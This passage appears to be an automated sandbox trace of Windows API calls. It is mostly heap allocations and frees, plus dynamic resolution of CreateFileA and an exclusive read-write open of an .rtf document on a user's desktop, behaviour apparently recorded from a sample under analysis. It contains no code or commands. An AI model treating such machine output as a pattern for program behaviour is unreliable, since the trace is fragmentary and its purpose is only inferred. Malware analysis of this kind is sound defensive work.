lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0030.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0030.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0030.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0030.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0030.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0030.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0030.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0030.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0030.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0030.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0030.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0030.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0030.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0030.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0030.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0030.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0030.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0030.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0030.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0030.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0030.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0030.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0030.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0030.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0030.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0030.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0030.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0030.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0030.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0030.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0030.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0030.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0030.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0030.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0030.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0030.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0030.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0030.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0030.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0030.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0030.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0030.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0030.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0030.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0030.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0030.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0030.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0030.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0030.388] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0030.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0030.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0030.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0030.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0030.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0030.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0030.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0030.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0030.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0030.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0030.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0030.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0030.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0030.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0030.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0030.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0030.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0030.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0030.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0030.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0030.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0030.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0030.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0030.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0030.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0030.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0030.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0030.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0030.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0030.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0030.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0030.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0030.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0030.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0030.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0030.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0030.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0030.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0030.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0030.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0030.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0030.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0030.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0030.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0030.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0030.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0030.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0030.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0030.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0030.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0030.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0030.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0030.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0030.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0030.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0030.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0030.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0030.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0030.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0030.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0030.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0030.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0030.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0030.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0030.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0030.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0030.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.390] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0030.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0030.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0030.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88cda8 [0030.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88cda8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0030.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0030.390] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0030.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0030.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0030.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0030.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0030.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0030.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0030.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cda8 [0030.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88cda8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0030.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0030.391] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0030.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0030.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0030.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0030.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0030.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0030.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0030.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0030.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0030.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0030.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0030.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0030.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x88ffb0 [0030.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T2TLwD.rtf", cchWideChar=49, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0030.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x31) returned 0x7c2080 [0030.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T2TLwD.rtf", cchWideChar=49, lpMultiByteStr=0x7c2080, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T2TLwD.rtf", lpUsedDefaultChar=0x0) returned 49 [0030.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0030.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0030.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0030.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0030.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0030.391] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T2TLwD.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\t2tlwd.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0030.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0030.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0030.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0030.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0030.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0030.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0030.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0030.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0030.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0030.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0030.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0030.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0030.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0030.392] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x88ffb0, cbMultiByte=49, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0030.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x62) returned 0x7c10a8 [0030.392] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x88ffb0, cbMultiByte=49, lpWideCharStr=0x7c10a8, cchWideChar=49 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T2TLwD.rtf") returned 49 [0030.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0030.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0030.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c10a8 | out: hHeap=0x770000) returned 1 [0030.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0030.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0030.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0030.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0030.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0030.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0030.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0030.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0030.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0030.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0030.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0030.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0030.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0030.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0030.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0030.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0030.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0030.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0030.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0030.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0030.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0030.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0030.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0030.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0030.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0030.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0030.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0030.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0030.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0030.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0030.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0030.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0030.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0030.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0030.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0030.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0030.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 